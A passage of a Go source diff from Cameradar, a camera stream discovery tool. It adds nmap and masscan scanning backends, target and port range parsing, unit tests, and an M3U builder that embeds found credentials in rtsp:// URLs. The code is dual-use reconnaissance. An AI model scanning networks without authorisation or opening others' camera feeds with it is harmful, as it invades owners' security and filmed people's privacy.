// BuildM3U creates an M3U playlist with discovered streams.
|
||||
func BuildM3U(streams []cameradar.Stream) string {
|
||||
var builder strings.Builder
|
||||
builder.WriteString("#EXTM3U\n")
|
||||
for _, stream := range streams {
|
||||
url := formatRTSPURL(stream)
|
||||
if url == "" {
|
||||
continue
|
||||
}
|
||||
builder.WriteString("#EXTINF:-1,")
|
||||
builder.WriteString(formatStreamLabel(stream))
|
||||
builder.WriteString("\n")
|
||||
builder.WriteString(url)
|
||||
builder.WriteString("\n")
|
||||
}
|
||||
return builder.String()
|
||||
}
|
||||
|
||||
func formatStreamLabel(stream cameradar.Stream) string {
|
||||
label := stream.Address.String() + ":" + strconv.FormatUint(uint64(stream.Port), 10)
|
||||
if stream.Device == "" {
|
||||
return label
|
||||
}
|
||||
return label + " (" + stream.Device + ")"
|
||||
}
|
||||
|
||||
func formatRTSPURL(stream cameradar.Stream) string {
|
||||
path := "/" + strings.TrimLeft(strings.TrimSpace(stream.Route()), "/")
|
||||
|
||||
credentials := ""
|
||||
if stream.CredentialsFound && (stream.Username != "" || stream.Password != "") {
|
||||
credentials = stream.Username + ":" + stream.Password + "@"
|
||||
}
|
||||
|
||||
return "rtsp://" + credentials + stream.Address.String() + ":" + strconv.FormatUint(uint64(stream.Port), 10) + path
|
||||
}
|
||||
@@ -0,0 +1,58 @@
|
||||
package scan
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"strings"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/scan/masscan"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/scan/nmap"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/scan/skip"
|
||||
)
|
||||
|
||||
// Supported discovery backends.
|
||||
const (
|
||||
ScannerNmap = "nmap"
|
||||
ScannerMasscan = "masscan"
|
||||
)
|
||||
|
||||
// Config configures how Cameradar discovers RTSP streams.
|
||||
type Config struct {
|
||||
SkipScan bool
|
||||
Targets []string
|
||||
Ports []string
|
||||
ScanSpeed int16
|
||||
Scanner string
|
||||
}
|
||||
|
||||
// Reporter reports scan progress and debug information.
|
||||
type Reporter interface {
|
||||
Debug(step cameradar.Step, message string)
|
||||
Progress(step cameradar.Step, message string)
|
||||
}
|
||||
|
||||
// New builds a stream scanner based on the provided configuration.
|
||||
func New(config Config, reporter Reporter) (cameradar.StreamScanner, error) {
|
||||
expandedTargets, err := expandTargetsForScan(config.Targets)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
if config.SkipScan {
|
||||
return skip.New(expandedTargets, config.Ports), nil
|
||||
}
|
||||
|
||||
scanner := strings.ToLower(strings.TrimSpace(config.Scanner))
|
||||
if scanner == "" {
|
||||
scanner = ScannerNmap
|
||||
}
|
||||
|
||||
switch scanner {
|
||||
case ScannerNmap:
|
||||
return nmap.New(config.ScanSpeed, expandedTargets, config.Ports, reporter)
|
||||
case ScannerMasscan:
|
||||
return masscan.New(expandedTargets, config.Ports, reporter)
|
||||
default:
|
||||
return nil, fmt.Errorf("unsupported scanner %q", scanner)
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,94 @@
|
||||
package scan_test
|
||||
|
||||
import (
|
||||
"net/netip"
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/scan"
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
func TestNew_UsesSkipScanner(t *testing.T) {
|
||||
config := scan.Config{
|
||||
SkipScan: true,
|
||||
Targets: []string{
|
||||
"192.0.2.0/30",
|
||||
"192.0.2.10-11",
|
||||
},
|
||||
Ports: []string{"554", "8554-8555"},
|
||||
ScanSpeed: 4,
|
||||
}
|
||||
|
||||
scanner, err := scan.New(config, nil)
|
||||
require.NoError(t, err)
|
||||
|
||||
streams, err := scanner.Scan(t.Context())
|
||||
require.NoError(t, err)
|
||||
|
||||
addrs := []netip.Addr{
|
||||
netip.MustParseAddr("192.0.2.0"),
|
||||
netip.MustParseAddr("192.0.2.1"),
|
||||
netip.MustParseAddr("192.0.2.2"),
|
||||
netip.MustParseAddr("192.0.2.3"),
|
||||
netip.MustParseAddr("192.0.2.10"),
|
||||
netip.MustParseAddr("192.0.2.11"),
|
||||
}
|
||||
portsExpected := []uint16{554, 8554, 8555}
|
||||
|
||||
var expected []cameradar.Stream
|
||||
for _, addr := range addrs {
|
||||
for _, port := range portsExpected {
|
||||
expected = append(expected, cameradar.Stream{
|
||||
Address: addr,
|
||||
Port: port,
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
assert.Equal(t, expected, streams)
|
||||
}
|
||||
|
||||
func TestNew_SkipScanPropagatesErrors(t *testing.T) {
|
||||
config := scan.Config{
|
||||
SkipScan: true,
|
||||
Targets: []string{"192.0.2.1"},
|
||||
Ports: []string{"8555-8554"},
|
||||
}
|
||||
|
||||
scanner, err := scan.New(config, nil)
|
||||
require.NoError(t, err)
|
||||
|
||||
_, err = scanner.Scan(t.Context())
|
||||
require.Error(t, err)
|
||||
assert.ErrorContains(t, err, "invalid port range")
|
||||
}
|
||||
|
||||
func TestNew_UnsupportedScanner(t *testing.T) {
|
||||
config := scan.Config{
|
||||
Targets: []string{"192.0.2.1"},
|
||||
Ports: []string{"554"},
|
||||
Scanner: "unsupported",
|
||||
}
|
||||
|
||||
_, err := scan.New(config, nil)
|
||||
require.Error(t, err)
|
||||
assert.ErrorContains(t, err, "unsupported scanner")
|
||||
}
|
||||
|
||||
func TestNew_SkipScanIgnoresUnsupportedScanner(t *testing.T) {
|
||||
config := scan.Config{
|
||||
SkipScan: true,
|
||||
Targets: []string{"192.0.2.1"},
|
||||
Ports: []string{"554"},
|
||||
Scanner: "unsupported",
|
||||
}
|
||||
|
||||
scanner, err := scan.New(config, nil)
|
||||
require.NoError(t, err)
|
||||
|
||||
streams, err := scanner.Scan(t.Context())
|
||||
require.NoError(t, err)
|
||||
assert.Equal(t, []cameradar.Stream{{Address: netip.MustParseAddr("192.0.2.1"), Port: 554}}, streams)
|
||||
}
|
||||
@@ -0,0 +1,109 @@
|
||||
package masscan
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"net/netip"
|
||||
"strings"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
masscanlib "github.com/Ullaakut/masscan"
|
||||
)
|
||||
|
||||
// Reporter reports scan progress and debug information.
|
||||
type Reporter interface {
|
||||
Debug(step cameradar.Step, message string)
|
||||
Progress(step cameradar.Step, message string)
|
||||
}
|
||||
|
||||
// Runner is something that can run a masscan scan.
|
||||
type Runner interface {
|
||||
Run(ctx context.Context) (*masscanlib.Run, error)
|
||||
}
|
||||
|
||||
// Scanner scans targets and ports for RTSP streams.
|
||||
type Scanner struct {
|
||||
runner Runner
|
||||
reporter Reporter
|
||||
}
|
||||
|
||||
// New returns a Scanner configured with the provided targets and ports.
|
||||
func New(targets, ports []string, reporter Reporter) (*Scanner, error) {
|
||||
runner, err := masscanlib.NewScanner(
|
||||
masscanlib.WithTargets(targets...),
|
||||
masscanlib.WithPorts(ports...),
|
||||
masscanlib.WithOpenOnly(),
|
||||
)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("creating masscan scanner: %w", err)
|
||||
}
|
||||
|
||||
return &Scanner{
|
||||
runner: runner,
|
||||
reporter: reporter,
|
||||
}, nil
|
||||
}
|
||||
|
||||
// Scan discovers RTSP streams on the configured targets and ports.
|
||||
func (s *Scanner) Scan(ctx context.Context) ([]cameradar.Stream, error) {
|
||||
return runScan(ctx, s.runner, s.reporter)
|
||||
}
|
||||
|
||||
func runScan(ctx context.Context, runner Runner, reporter Reporter) ([]cameradar.Stream, error) {
|
||||
results, err := runner.Run(ctx)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("scanning network: %w", err)
|
||||
}
|
||||
|
||||
for _, warning := range results.Warnings() {
|
||||
reporter.Debug(cameradar.StepScan, "masscan warning: "+warning)
|
||||
}
|
||||
|
||||
var streams []cameradar.Stream
|
||||
for _, host := range results.Hosts {
|
||||
address := strings.TrimSpace(host.Address)
|
||||
if address == "" {
|
||||
reporter.Progress(cameradar.StepScan, "Skipping host with empty address")
|
||||
continue
|
||||
}
|
||||
|
||||
addr, err := netip.ParseAddr(address)
|
||||
if err != nil {
|
||||
reporter.Progress(cameradar.StepScan, fmt.Sprintf("Skipping invalid address %q: %v", host.Address, err))
|
||||
continue
|
||||
}
|
||||
|
||||
for _, port := range host.Ports {
|
||||
if port.Status != "open" {
|
||||
continue
|
||||
}
|
||||
|
||||
if port.Number <= 0 || port.Number > 65535 {
|
||||
reporter.Progress(cameradar.StepScan, fmt.Sprintf("Skipping invalid port %d on %s", port.Number, host.Address))
|
||||
continue
|
||||
}
|
||||
|
||||
streams = append(streams, cameradar.Stream{
|
||||
Address: addr,
|
||||
Port: uint16(port.Number),
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
reporter.Progress(cameradar.StepScan, fmt.Sprintf("Found %d RTSP streams", len(streams)))
|
||||
updateSummary(reporter, streams)
|
||||
|
||||
return streams, nil
|
||||
}
|
||||
|
||||
type summaryUpdater interface {
|
||||
UpdateSummary(streams []cameradar.Stream)
|
||||
}
|
||||
|
||||
func updateSummary(reporter Reporter, streams []cameradar.Stream) {
|
||||
updater, ok := reporter.(summaryUpdater)
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
updater.UpdateSummary(streams)
|
||||
}
|
||||
@@ -0,0 +1,133 @@
|
||||
package masscan
|
||||
|
||||
import (
|
||||
"context"
|
||||
"errors"
|
||||
"net/netip"
|
||||
"sync"
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
masscanlib "github.com/Ullaakut/masscan"
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
func TestRunScan(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
result *masscanlib.Run
|
||||
err error
|
||||
wantStreams []cameradar.Stream
|
||||
wantDebug []string
|
||||
wantProgress []string
|
||||
wantErrContains string
|
||||
}{
|
||||
{
|
||||
name: "filters invalid addresses, closed and invalid ports",
|
||||
result: &masscanlib.Run{
|
||||
Hosts: []masscanlib.Host{
|
||||
{
|
||||
Address: "192.0.2.10",
|
||||
Ports: []masscanlib.Port{
|
||||
{Number: 554, Status: "open"},
|
||||
{Number: 8554, Status: "closed"},
|
||||
{Number: 0, Status: "open"},
|
||||
},
|
||||
},
|
||||
{Address: "not-an-ip", Ports: []masscanlib.Port{{Number: 8554, Status: "open"}}},
|
||||
{Address: "", Ports: []masscanlib.Port{{Number: 8554, Status: "open"}}},
|
||||
},
|
||||
},
|
||||
wantStreams: []cameradar.Stream{
|
||||
{Address: netip.MustParseAddr("192.0.2.10"), Port: 554},
|
||||
},
|
||||
wantProgress: []string{
|
||||
"Skipping invalid port 0 on 192.0.2.10",
|
||||
"Skipping invalid address \"not-an-ip\": ParseAddr(\"not-an-ip\"): unable to parse IP",
|
||||
"Skipping host with empty address",
|
||||
"Found 1 RTSP streams",
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "collects streams from multiple hosts",
|
||||
result: &masscanlib.Run{
|
||||
Hosts: []masscanlib.Host{
|
||||
{Address: "192.0.2.10", Ports: []masscanlib.Port{{Number: 8554, Status: "open"}}},
|
||||
{Address: "198.51.100.9", Ports: []masscanlib.Port{{Number: 554, Status: "open"}}},
|
||||
},
|
||||
},
|
||||
wantStreams: []cameradar.Stream{
|
||||
{Address: netip.MustParseAddr("192.0.2.10"), Port: 8554},
|
||||
{Address: netip.MustParseAddr("198.51.100.9"), Port: 554},
|
||||
},
|
||||
wantProgress: []string{"Found 2 RTSP streams"},
|
||||
},
|
||||
{
|
||||
name: "returns error when scan fails",
|
||||
err: errors.New("scan failed"),
|
||||
wantErrContains: "scanning network",
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
reporter := &recordingReporter{}
|
||||
|
||||
streams, err := runScan(t.Context(), fakeRunner{result: test.result, err: test.err}, reporter)
|
||||
|
||||
if test.wantErrContains != "" {
|
||||
require.Error(t, err)
|
||||
assert.ErrorContains(t, err, test.wantErrContains)
|
||||
assert.Empty(t, streams)
|
||||
assert.Empty(t, reporter.progress)
|
||||
assert.Equal(t, test.wantDebug, reporter.debug)
|
||||
return
|
||||
}
|
||||
|
||||
require.NoError(t, err)
|
||||
assert.Equal(t, test.wantStreams, streams)
|
||||
assert.Equal(t, test.wantDebug, reporter.debug)
|
||||
for _, progress := range test.wantProgress {
|
||||
assert.Contains(t, reporter.progress, progress)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
type fakeRunner struct {
|
||||
result *masscanlib.Run
|
||||
err error
|
||||
}
|
||||
|
||||
func (f fakeRunner) Run(context.Context) (*masscanlib.Run, error) {
|
||||
return f.result, f.err
|
||||
}
|
||||
|
||||
type recordingReporter struct {
|
||||
mu sync.Mutex
|
||||
debug []string
|
||||
progress []string
|
||||
}
|
||||
|
||||
func (r *recordingReporter) Start(cameradar.Step, string) {}
|
||||
|
||||
func (r *recordingReporter) Done(cameradar.Step, string) {}
|
||||
|
||||
func (r *recordingReporter) Progress(_ cameradar.Step, message string) {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
r.progress = append(r.progress, message)
|
||||
}
|
||||
|
||||
func (r *recordingReporter) Debug(_ cameradar.Step, message string) {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
r.debug = append(r.debug, message)
|
||||
}
|
||||
|
||||
func (r *recordingReporter) Error(cameradar.Step, error) {}
|
||||
|
||||
func (r *recordingReporter) Summary([]cameradar.Stream, error) {}
|
||||
|
||||
func (r *recordingReporter) Close() {}
|
||||
@@ -0,0 +1,106 @@
|
||||
package nmap
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"net/netip"
|
||||
"strings"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
nmaplib "github.com/Ullaakut/nmap/v4"
|
||||
)
|
||||
|
||||
// Reporter reports scan progress and debug information.
|
||||
type Reporter interface {
|
||||
Debug(step cameradar.Step, message string)
|
||||
Progress(step cameradar.Step, message string)
|
||||
}
|
||||
|
||||
// Runner is something that can run an nmap scan.
|
||||
type Runner interface {
|
||||
Run(ctx context.Context) (*nmaplib.Run, error)
|
||||
}
|
||||
|
||||
// Scanner scans targets and ports for RTSP streams.
|
||||
type Scanner struct {
|
||||
runner Runner
|
||||
reporter Reporter
|
||||
}
|
||||
|
||||
// New returns a Scanner configured with the provided terminal and scan speed.
|
||||
func New(scanSpeed int16, targets, ports []string, reporter Reporter) (*Scanner, error) {
|
||||
runner, err := nmaplib.NewScanner(
|
||||
nmaplib.WithTargets(targets...),
|
||||
nmaplib.WithPorts(ports...),
|
||||
nmaplib.WithServiceInfo(),
|
||||
nmaplib.WithTimingTemplate(nmaplib.Timing(scanSpeed)),
|
||||
)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("creating nmap scanner: %w", err)
|
||||
}
|
||||
|
||||
return &Scanner{
|
||||
runner: runner,
|
||||
reporter: reporter,
|
||||
}, nil
|
||||
}
|
||||
|
||||
// Scan discovers RTSP streams on the configured targets and ports.
|
||||
func (s *Scanner) Scan(ctx context.Context) ([]cameradar.Stream, error) {
|
||||
return runScan(ctx, s.runner, s.reporter)
|
||||
}
|
||||
|
||||
func runScan(ctx context.Context, nmap Runner, reporter Reporter) ([]cameradar.Stream, error) {
|
||||
results, err := nmap.Run(ctx)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("scanning network: %w", err)
|
||||
}
|
||||
|
||||
for _, warning := range results.Warnings() {
|
||||
reporter.Debug(cameradar.StepScan, "nmap warning: "+warning)
|
||||
}
|
||||
|
||||
var streams []cameradar.Stream
|
||||
for _, host := range results.Hosts {
|
||||
for _, port := range host.Ports {
|
||||
if port.Status() != "open" {
|
||||
continue
|
||||
}
|
||||
|
||||
if !strings.Contains(port.Service.Name, "rtsp") {
|
||||
continue
|
||||
}
|
||||
|
||||
for _, address := range host.Addresses {
|
||||
addr, err := netip.ParseAddr(address.Addr)
|
||||
if err != nil {
|
||||
reporter.Progress(cameradar.StepScan, fmt.Sprintf("Skipping invalid address %q: %v", address.Addr, err))
|
||||
continue
|
||||
}
|
||||
|
||||
streams = append(streams, cameradar.Stream{
|
||||
Device: port.Service.Product,
|
||||
Address: addr,
|
||||
Port: port.ID,
|
||||
})
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
reporter.Progress(cameradar.StepScan, fmt.Sprintf("Found %d RTSP streams", len(streams)))
|
||||
updateSummary(reporter, streams)
|
||||
|
||||
return streams, nil
|
||||
}
|
||||
|
||||
type summaryUpdater interface {
|
||||
UpdateSummary(streams []cameradar.Stream)
|
||||
}
|
||||
|
||||
func updateSummary(reporter Reporter, streams []cameradar.Stream) {
|
||||
updater, ok := reporter.(summaryUpdater)
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
updater.UpdateSummary(streams)
|
||||
}
|
||||
@@ -0,0 +1,187 @@
|
||||
package nmap
|
||||
|
||||
import (
|
||||
"context"
|
||||
"errors"
|
||||
"net/netip"
|
||||
"sync"
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
nmaplib "github.com/Ullaakut/nmap/v4"
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
func TestScanner_Scan(t *testing.T) {
|
||||
ctx := context.WithValue(t.Context(), contextKey("trace"), "scan")
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
result *nmaplib.Run
|
||||
err error
|
||||
wantStreams []cameradar.Stream
|
||||
wantDebug []string
|
||||
wantProgress string
|
||||
wantErrContains string
|
||||
}{
|
||||
{
|
||||
name: "filters non-rtsp and closed ports",
|
||||
result: buildRun(nmaplib.Host{
|
||||
Addresses: []nmaplib.Address{
|
||||
{Addr: "127.0.0.1"},
|
||||
{Addr: "not-an-ip"},
|
||||
},
|
||||
Ports: []nmaplib.Port{
|
||||
openPort(8554, "rtsp", "ACME"),
|
||||
closedPort(554, "rtsp", "ACME"),
|
||||
openPort(80, "http", "ACME"),
|
||||
},
|
||||
}),
|
||||
wantStreams: []cameradar.Stream{
|
||||
{
|
||||
Device: "ACME",
|
||||
Address: netip.MustParseAddr("127.0.0.1"),
|
||||
Port: 8554,
|
||||
},
|
||||
},
|
||||
wantProgress: "Found 1 RTSP streams",
|
||||
},
|
||||
{
|
||||
name: "collects multiple hosts",
|
||||
result: buildRun(
|
||||
nmaplib.Host{
|
||||
Addresses: []nmaplib.Address{{Addr: "192.0.2.10"}, {Addr: "192.0.2.11"}},
|
||||
Ports: []nmaplib.Port{
|
||||
openPort(8554, "rtsp-alt", "Model A"),
|
||||
},
|
||||
},
|
||||
nmaplib.Host{
|
||||
Addresses: []nmaplib.Address{{Addr: "198.51.100.9"}},
|
||||
Ports: []nmaplib.Port{
|
||||
openPort(554, "rtsp", "Model B"),
|
||||
},
|
||||
},
|
||||
),
|
||||
wantStreams: []cameradar.Stream{
|
||||
{
|
||||
Device: "Model A",
|
||||
Address: netip.MustParseAddr("192.0.2.10"),
|
||||
Port: 8554,
|
||||
},
|
||||
{
|
||||
Device: "Model A",
|
||||
Address: netip.MustParseAddr("192.0.2.11"),
|
||||
Port: 8554,
|
||||
},
|
||||
{
|
||||
Device: "Model B",
|
||||
Address: netip.MustParseAddr("198.51.100.9"),
|
||||
Port: 554,
|
||||
},
|
||||
},
|
||||
wantProgress: "Found 3 RTSP streams",
|
||||
},
|
||||
{
|
||||
name: "returns error when scan fails",
|
||||
err: errors.New("scan failed"),
|
||||
wantErrContains: "scanning network",
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
reporter := &recordingReporter{}
|
||||
|
||||
scanner, err := New(4, []string{"192.0.2.1"}, []string{"554", "8554"}, reporter)
|
||||
require.NoError(t, err)
|
||||
|
||||
scanner.runner = fakeRunner{result: test.result, err: test.err}
|
||||
|
||||
streams, err := scanner.Scan(ctx)
|
||||
|
||||
if test.wantErrContains != "" {
|
||||
require.Error(t, err)
|
||||
assert.ErrorContains(t, err, test.wantErrContains)
|
||||
assert.Empty(t, streams)
|
||||
assert.Empty(t, reporter.progress)
|
||||
assert.Equal(t, test.wantDebug, reporter.debug)
|
||||
return
|
||||
}
|
||||
|
||||
require.NoError(t, err)
|
||||
assert.Equal(t, test.wantStreams, streams)
|
||||
assert.Equal(t, test.wantDebug, reporter.debug)
|
||||
assert.Contains(t, reporter.progress, test.wantProgress)
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
type contextKey string
|
||||
|
||||
type fakeRunner struct {
|
||||
result *nmaplib.Run
|
||||
err error
|
||||
}
|
||||
|
||||
func (f fakeRunner) Run(context.Context) (*nmaplib.Run, error) {
|
||||
return f.result, f.err
|
||||
}
|
||||
|
||||
type recordingReporter struct {
|
||||
mu sync.Mutex
|
||||
debug []string
|
||||
progress []string
|
||||
}
|
||||
|
||||
func (r *recordingReporter) Start(cameradar.Step, string) {}
|
||||
|
||||
func (r *recordingReporter) Done(cameradar.Step, string) {}
|
||||
|
||||
func (r *recordingReporter) Progress(_ cameradar.Step, message string) {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
r.progress = append(r.progress, message)
|
||||
}
|
||||
|
||||
func (r *recordingReporter) Debug(_ cameradar.Step, message string) {
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
r.debug = append(r.debug, message)
|
||||
}
|
||||
|
||||
func (r *recordingReporter) Error(cameradar.Step, error) {}
|
||||
|
||||
func (r *recordingReporter) Summary([]cameradar.Stream, error) {}
|
||||
|
||||
func (r *recordingReporter) Close() {}
|
||||
|
||||
func buildRun(hosts ...nmaplib.Host) *nmaplib.Run {
|
||||
return &nmaplib.Run{Hosts: hosts}
|
||||
}
|
||||
|
||||
func openPort(id uint16, serviceName, product string) nmaplib.Port {
|
||||
return nmaplib.Port{
|
||||
ID: id,
|
||||
State: nmaplib.State{
|
||||
State: string(nmaplib.Open),
|
||||
},
|
||||
Service: nmaplib.Service{
|
||||
Name: serviceName,
|
||||
Product: product,
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
func closedPort(id uint16, serviceName, product string) nmaplib.Port {
|
||||
return nmaplib.Port{
|
||||
ID: id,
|
||||
State: nmaplib.State{
|
||||
State: string(nmaplib.Closed),
|
||||
},
|
||||
Service: nmaplib.Service{
|
||||
Name: serviceName,
|
||||
Product: product,
|
||||
},
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,338 @@
|
||||
package skip
|
||||
|
||||
import (
|
||||
"context"
|
||||
"errors"
|
||||
"fmt"
|
||||
"net"
|
||||
"net/netip"
|
||||
"strconv"
|
||||
"strings"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
)
|
||||
|
||||
// Scanner is a stream scanner that skips discovery and treats every target/port as a stream.
|
||||
type Scanner struct {
|
||||
targets []string
|
||||
ports []string
|
||||
}
|
||||
|
||||
// New builds a scanner that skips discovery and treats every target/port as a stream.
|
||||
func New(targets, ports []string) *Scanner {
|
||||
return &Scanner{
|
||||
targets: targets,
|
||||
ports: ports,
|
||||
}
|
||||
}
|
||||
|
||||
// Scan returns the precomputed list of streams.
|
||||
func (s *Scanner) Scan(ctx context.Context) ([]cameradar.Stream, error) {
|
||||
return buildStreamsFromTargets(ctx, s.targets, s.ports)
|
||||
}
|
||||
|
||||
func buildStreamsFromTargets(ctx context.Context, targets, ports []string) ([]cameradar.Stream, error) {
|
||||
resolvedPorts, err := parsePorts(ctx, ports)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if len(resolvedPorts) == 0 {
|
||||
return nil, errors.New("no valid ports provided")
|
||||
}
|
||||
|
||||
resolvedTargets, err := expandTargets(ctx, targets)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if len(resolvedTargets) == 0 {
|
||||
return nil, errors.New("no valid target addresses resolved")
|
||||
}
|
||||
|
||||
streams := make([]cameradar.Stream, 0, len(resolvedTargets)*len(resolvedPorts))
|
||||
for _, addr := range resolvedTargets {
|
||||
for _, port := range resolvedPorts {
|
||||
streams = append(streams, cameradar.Stream{
|
||||
Address: addr,
|
||||
Port: port,
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
return streams, nil
|
||||
}
|
||||
|
||||
func parsePorts(ctx context.Context, ports []string) ([]uint16, error) {
|
||||
seen := make(map[uint16]struct{})
|
||||
resolved := make([]uint16, 0, len(ports))
|
||||
|
||||
for _, entry := range ports {
|
||||
for raw := range strings.SplitSeq(entry, ",") {
|
||||
value := strings.TrimSpace(raw)
|
||||
if value == "" {
|
||||
continue
|
||||
}
|
||||
|
||||
values, err := parsePortValue(ctx, value)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
for _, port := range values {
|
||||
if _, exists := seen[port]; exists {
|
||||
continue
|
||||
}
|
||||
seen[port] = struct{}{}
|
||||
resolved = append(resolved, port)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return resolved, nil
|
||||
}
|
||||
|
||||
func parsePortValue(ctx context.Context, value string) ([]uint16, error) {
|
||||
if strings.Contains(value, "-") {
|
||||
parts := strings.SplitN(value, "-", 2)
|
||||
if len(parts) != 2 {
|
||||
return nil, fmt.Errorf("invalid port range %q", value)
|
||||
}
|
||||
|
||||
start, err := parsePortNumber(strings.TrimSpace(parts[0]))
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("invalid port range %q: %w", value, err)
|
||||
}
|
||||
end, err := parsePortNumber(strings.TrimSpace(parts[1]))
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("invalid port range %q: %w", value, err)
|
||||
}
|
||||
if start > end {
|
||||
return nil, fmt.Errorf("invalid port range %q", value)
|
||||
}
|
||||
|
||||
ports := make([]uint16, 0, end-start+1)
|
||||
for port := start; port <= end; port++ {
|
||||
ports = append(ports, port)
|
||||
}
|
||||
return ports, nil
|
||||
}
|
||||
|
||||
port, err := parsePortNumber(value)
|
||||
if err == nil {
|
||||
return []uint16{port}, nil
|
||||
}
|
||||
|
||||
servicePort, lookupErr := net.DefaultResolver.LookupPort(ctx, "tcp", value)
|
||||
if lookupErr != nil {
|
||||
return nil, fmt.Errorf("invalid port %q", value)
|
||||
}
|
||||
if servicePort < 1 || servicePort > 65535 {
|
||||
return nil, fmt.Errorf("port %d out of range", servicePort)
|
||||
}
|
||||
return []uint16{uint16(servicePort)}, nil
|
||||
}
|
||||
|
||||
func parsePortNumber(value string) (uint16, error) {
|
||||
port, err := strconv.Atoi(value)
|
||||
if err != nil {
|
||||
return 0, err
|
||||
}
|
||||
if port < 1 || port > 65535 {
|
||||
return 0, fmt.Errorf("port %d out of range", port)
|
||||
}
|
||||
return uint16(port), nil
|
||||
}
|
||||
|
||||
func expandTargets(ctx context.Context, targets []string) ([]netip.Addr, error) {
|
||||
seen := make(map[netip.Addr]struct{})
|
||||
resolved := make([]netip.Addr, 0, len(targets))
|
||||
|
||||
for _, target := range targets {
|
||||
value := strings.TrimSpace(target)
|
||||
if value == "" {
|
||||
continue
|
||||
}
|
||||
|
||||
addrs, err := parseTargetAddrs(ctx, value)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
for _, addr := range addrs {
|
||||
if !addr.IsValid() {
|
||||
continue
|
||||
}
|
||||
if _, exists := seen[addr]; exists {
|
||||
continue
|
||||
}
|
||||
seen[addr] = struct{}{}
|
||||
resolved = append(resolved, addr)
|
||||
}
|
||||
}
|
||||
|
||||
return resolved, nil
|
||||
}
|
||||
|
||||
func parseTargetAddrs(ctx context.Context, target string) ([]netip.Addr, error) {
|
||||
prefix, err := netip.ParsePrefix(target)
|
||||
if err == nil { // Return early.
|
||||
return expandPrefix(prefix), nil
|
||||
}
|
||||
|
||||
if strings.Contains(target, "-") {
|
||||
addrs, ok, err := parseIPv4Range(target)
|
||||
if ok {
|
||||
return addrs, err
|
||||
}
|
||||
}
|
||||
|
||||
addr, err := netip.ParseAddr(target)
|
||||
if err == nil { // Return early.
|
||||
return []netip.Addr{addr}, nil
|
||||
}
|
||||
|
||||
ips, err := net.DefaultResolver.LookupIPAddr(ctx, target)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("resolving hostname %q: %w", target, err)
|
||||
}
|
||||
|
||||
addrs := make([]netip.Addr, 0, len(ips))
|
||||
for _, ip := range ips {
|
||||
addr, ok := netip.AddrFromSlice(ip.IP)
|
||||
if !ok {
|
||||
continue
|
||||
}
|
||||
addrs = append(addrs, addr.Unmap())
|
||||
}
|
||||
|
||||
if len(addrs) == 0 {
|
||||
return nil, fmt.Errorf("no ip addresses found for hostname %q", target)
|
||||
}
|
||||
|
||||
return addrs, nil
|
||||
}
|
||||
|
||||
func expandPrefix(prefix netip.Prefix) []netip.Addr {
|
||||
if !prefix.IsValid() {
|
||||
return nil
|
||||
}
|
||||
|
||||
prefix = prefix.Masked()
|
||||
addr := prefix.Addr()
|
||||
addrs := make([]netip.Addr, 0, 16)
|
||||
|
||||
for current := addr; prefix.Contains(current); {
|
||||
addrs = append(addrs, current)
|
||||
next := current.Next()
|
||||
if !next.IsValid() {
|
||||
break
|
||||
}
|
||||
current = next
|
||||
}
|
||||
|
||||
return addrs
|
||||
}
|
||||
|
||||
type octetRange struct {
